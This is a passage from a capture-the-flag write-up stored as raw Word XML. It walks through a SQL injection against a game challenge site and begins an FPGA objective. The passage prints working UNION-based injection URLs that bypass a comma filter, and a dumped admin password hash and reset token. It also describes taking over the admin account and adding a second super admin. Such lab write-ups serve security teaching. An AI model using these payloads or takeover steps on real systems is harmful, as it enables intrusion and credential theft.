    <w:p w14:paraId="2DAAE09F" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>View.exports.renderFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [as engine] (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/ejs.js:482:10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F780164" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>View.render</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/express/lib/view.js:135:8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA13B3" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tryRender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/express/lib/application.js:640:10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1612CA8D" w14:textId="427CBE8F" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Function.render</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/express/lib/application.js:592:3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304ECB2" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00A612B6"/>
    <w:p w14:paraId="09DAD58D" w14:textId="73515A5F" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00A612B6">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t>detail.ejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file is looking specifically for a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dateFormat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> when reading the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>date_update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” column for output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A73E47" w14:textId="502DD896" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00A612B6">
      <w:r>
        <w:t>I made a quick comparison to see what the mapping was between the two tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C666D15" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id:id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (good)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7073776C" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>full_name:name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (good)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B95E4D" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>email:email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (good)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A637163" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>phone (varchar 50):password (varchar 255)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7401AC64" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>country (varchar 255):</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (varchar 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F78D4" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>date_created:date_created</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (good)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCA502" w14:textId="32274EB3" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>date_update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (datetime):token (varchar 255)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902E858" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507E0AA9" w14:textId="5F35D9DD" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00A612B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>When the injection goes to drop “token” in the output format for “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>date_update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” the incompatibility between the two types causes the rendering to fail—the SQLi was successful but the server failed to process the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3CAF4" w14:textId="28790B15" w:rsidR="00A612B6" w:rsidRDefault="001F1F4C" w:rsidP="00A612B6">
      <w:r>
        <w:t>The solution for this would be to choose columns in the order we want via the SELECT statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AAFE8B" w14:textId="35806F9D" w:rsidR="001F1F4C" w:rsidRDefault="001F1F4C" w:rsidP="00A612B6">
      <w:r>
        <w:t>An ideal query would have looked like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B469CCD" w14:textId="32ECD23C" w:rsidR="001F1F4C" w:rsidRDefault="001F1F4C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WHERE id=600 UNION ALL SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id,name,email,password,user_status,date_created,date_created</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --; or =?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424A0730" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EFEB5F" w14:textId="4435F556" w:rsidR="001F1F4C" w:rsidRDefault="001F1F4C" w:rsidP="00A612B6">
      <w:r>
        <w:t xml:space="preserve">The only complication is that, due to the way the details page parses the arguments sent via the page, all the commas are removed. It doesn’t matter that it’s URL encoded. By the time it hits the query, no more commas exist in the code, so select looks for a column </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>idnameemailpassworduser_statusdate_created_date_created</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instead of the carefully curated, expertly ordered list required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A1E94" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00980740" w:rsidP="00A612B6">
      <w:r>
        <w:t>After furiously Googling “SQL injection no commas???” for a while I came across this incredibly cursed</w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">solution: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511C62C" w14:textId="26921CDD" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00980740">
        <w:t xml:space="preserve">select * from (select id from users)a join (select name from users)b join (select email from users)c join (select password from users)d join (select token from users)e join (select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00980740">
        <w:t>date_created</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00980740">
        <w:t xml:space="preserve"> from users)f join (select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00980740">
        <w:t>date_created</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00980740">
        <w:t xml:space="preserve"> from users)g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692D8FFD" w14:textId="27B407D3" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00A612B6">
      <w:r>
        <w:t>Altogether, the request looked like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409CEC30" w14:textId="3B0CC18D" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00980740">
        <w:t>https://staging.jackfrosttower.com/detail/666%20UNION%20ALL%20select%20*%20from%20(select%20id%20from%20users)a%20join%20(select%20name%20from%20users)b%20join%20(select%20email%20from%20users)c%20join%20(select%20password%20from%20users)d%20join%20(select%20token%20from%20users)e%20join%20(select%20date_created%20from%20users)f%20join%20(select%20date_created%20from%20users)g%20LIMIT%2010--,602</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03066BAC" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00A612B6"/>
    <w:p w14:paraId="1C2760D5" w14:textId="285D4F4C" w:rsidR="00A612B6" w:rsidRDefault="00980740" w:rsidP="00A612B6">
      <w:r>
        <w:t xml:space="preserve">This successfully pulled out the details from the users table. Of note was the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “Super Admin” account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63193C" w14:textId="77777777" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03CBEE97" w14:textId="77777777" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$2b$15$KOFchO9HQuAuGqs0SqYKq.fH1n8ssHP7.nSL58Dd53doWHkNoJtte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418CB786" w14:textId="77777777" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>xBINAYZJNglGGtsh16uVGyRLKylD0vlc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E697103" w14:textId="77777777" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>November 23rd, 2021 11:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903A113" w14:textId="203BF45E" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>November 23rd, 2021 11:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34795F5E" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00980740"/>
    <w:p w14:paraId="371A877A" w14:textId="6D98C45A" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00980740">
      <w:r>
        <w:t xml:space="preserve">Based on the placement of my SELECT columns and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detail.ejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> template, I knew that </w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t>result contained</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the password and token for the admin account. At this point, I don’t think the user account is necessary. The injection I need to get my data is working</w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve"> so far and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> just needs to be modified. At this point I have also read enough of the code over and over </w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve">and over </w:t>
      </w:r>
      <w:r>
        <w:t>again</w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve"> that I believe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> there is not much the admin can do that we need. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CC6BFC" w14:textId="022D39BD" w:rsidR="00F5566D" w:rsidRDefault="00980740" w:rsidP="00F5566D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>However</w:t>
      </w:r>
      <w:r>
        <w:t>, to complete a strand I chased in the beginning of the analysis, I was able to submit the “token” for “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forgotpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/token/</w:t>
      </w:r>
      <w:r w:rsidR="00F5566D">
        <w:t xml:space="preserve">xBINAYZJNglGGtsh16uVGyRLKylD0vlc to change the password for the admin account. Per the code, when this was completed the “token” field was cleared. Another player would have to request a reset for the account to regenerate the token and change a password to access this account. Just in case, I used my access with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F5566D">
        <w:t>root@localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F5566D">
        <w:t xml:space="preserve"> account to add myself another super admin had someone reset the admin and I lost access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7607E4A8" w14:textId="30B7E141" w:rsidR="00F5566D" w:rsidRDefault="00F5566D" w:rsidP="00F5566D">
      <w:r>
        <w:t xml:space="preserve">Moving on from that diversion—the code that performed the initial </w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could be slightly modified to pull a different column from a different table. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output indicated the notes field was non-numeric and should easily line up with any of the fields being selected from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360CBE8" w14:textId="0485D5BB" w:rsidR="00F5566D" w:rsidRDefault="00F5566D" w:rsidP="00F5566D">
      <w:r>
        <w:t xml:space="preserve">For some reason I didn’t care to trace out, the query worked as expected when setting a column to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo.note</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, but only a single result was retrieved. Since I knew that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> had an ID field, I simply stepped through each entry by modifying the portion of the query that entailed (</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">select id from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> where id=[count])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B6E8C" w14:textId="4A2F0AE3" w:rsidR="00F5566D" w:rsidRDefault="000C2525" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00A10D05" w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://staging.jackfrosttower.com/detail/666%20UNION%20ALL%20select%20*%20from%20(select%20note%20from%20todo)a%20join%20(select%20id%20from%20todo)b%20join%20(select%20note%20from%20todo%20where%20id%3D2)c%20join%20(select%20password%20from%20users)d%20join%20(select%20token%20from%20users)e%20join%20(select%20date_created%20from%20users)f%20join%20(select%20date_created%20from%20users)g%20LIMIT%2010--,602</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="372E5AA2" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00F5566D"/>
    <w:p w14:paraId="276E6E67" w14:textId="10FF8F6F" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00F5566D">
      <w:r>
        <w:t>This reveals the following plan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F485ED4" w14:textId="266B48B0" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>TODO 1: Buy up land all around Santa's Castle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066AC2E9" w14:textId="1859CD9F" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>TODO 2: Build bigger and more majestic tower next to Santa's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C41A98" w14:textId="17AF1F72" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TODO 3: Erode Santa's influence at the North Pole via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FrostFest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, the greatest Con in history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D0AAB" w14:textId="157AC94D" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>TODO 4: Dishearten Santa's elves and encourage defection to our cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF069C" w14:textId="2B89EC04" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>TODO 5: Steal Santa's sleigh technology and build a competing and way better Frosty present delivery vehicle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D42E6" w14:textId="0516A489" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>TODO 6: Undermine Santa's ability to deliver presents on 12/24 through elf staff shortages, technology glitches, and assorted mayhem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DDAD9E" w14:textId="039DCD94" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>TODO  7: Force Santa to cancel Christmas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD036A" w14:textId="62D0E994" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TODO  8: SAVE THE DAY by delivering Frosty presents using merch from the Frost Tower Gift Shop to children world-wide... so the whole world sees that Frost saved the Holiday Season!!!! </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bwahahahahaha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A708E84" w14:textId="57E44F13" w:rsidR="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>TODO  9: With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on him</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A5907" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00A10D05"/>
    <w:p w14:paraId="6CBA8176" w14:textId="48141A86" w:rsidR="00A10D05" w:rsidRPr="00A10D05" w:rsidRDefault="00A10D05" w:rsidP="00A10D05">
      <w:r>
        <w:t xml:space="preserve">The answer to this challenge is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clerk</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E11DEA" w14:textId="7B579928" w:rsidR="00980740" w:rsidRDefault="00980740" w:rsidP="00980740"/>
    <w:p w14:paraId="1E6F230F" w14:textId="2D462CEC" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 13 – FPGA Programming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37275363" w14:textId="718551C5" w:rsidR="00853B73" w:rsidRDefault="00FB2410">
      <w:r>
        <w:t xml:space="preserve">The final challenge is to program an FPGA </w:t>
      </w:r>
      <w:r w:rsidR="007E2CCE">
        <w:t>chip intended for use with a new doll.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229EF3AC" w14:textId="0B418C33" w:rsidR="007E2CCE" w:rsidRDefault="007E2CCE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We need to be able to generate a square wave for 500Hz, 1KHz, 2KHz frequency inputs as well as a random frequency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC40AA" w14:textId="7813860E" w:rsidR="007E2CCE" w:rsidRDefault="007E2CCE">
      <w:r>
        <w:t xml:space="preserve">It was very difficult to get started on this challenge. However, there is a great writeup available here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://numato.com/kb/generating-square-wave-using-fpga/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BFA2120" w14:textId="66F77F0E" w:rsidR="007E2CCE" w:rsidRDefault="007E2CCE">
      <w:r>
        <w:t xml:space="preserve">The detail in the article summary was helpful to begin understanding more about the challenge at hand. The “elaborate code” was easy to bring into the console and adapt to generate valid code. The biggest difference is that instead of providing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>CLOCK_FREQUENCY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>freq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is already being provided as an input and cannot be manually set. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD2364B" w14:textId="7A4EAEC8" w:rsidR="007E2CCE" w:rsidRDefault="00E00F99">
      <w:r>
        <w:t xml:space="preserve">I was completely lost on where to start with this and the implications of clock speed and frequency. So, I just started throwing numbers into it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37942173" w14:textId="68AE33F7" w:rsidR="00E00F99" w:rsidRDefault="00E00F99">
      <w:r>
        <w:t xml:space="preserve">I found that using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>freq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
